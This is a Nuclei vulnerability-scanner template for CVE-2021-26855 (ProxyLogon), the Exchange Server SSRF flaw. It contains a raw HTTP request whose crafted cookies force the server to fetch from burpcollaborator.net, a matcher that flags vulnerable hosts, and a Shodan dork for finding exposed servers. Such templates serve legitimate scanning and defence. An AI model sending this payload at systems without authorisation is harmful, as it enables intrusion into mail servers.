nuclei-templates/cves/2021/CVE-2021-26855.yaml

33 lines
1.1 KiB
YAML

id: CVE-2021-26855
info:
name: Exchange Server SSRF Vulnerability
author: madrobot
severity: critical
reference: https://proxylogon.com/#timeline
nse: https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse
dork: https://www.shodan.io/search?query=vuln%3ACVE-2021-26855
description: |
Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078.
tags: cve,cve2021,ssrf,rce,exchange
requests:
- raw:
- |
GET /owa/auth/x.js HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
Cookie: X-AnonResource=true; X-AnonResource-Backend=burpcollaborator.net/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
Accept-Language: en
Connection: close
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Burp Collaborator Server"
part: body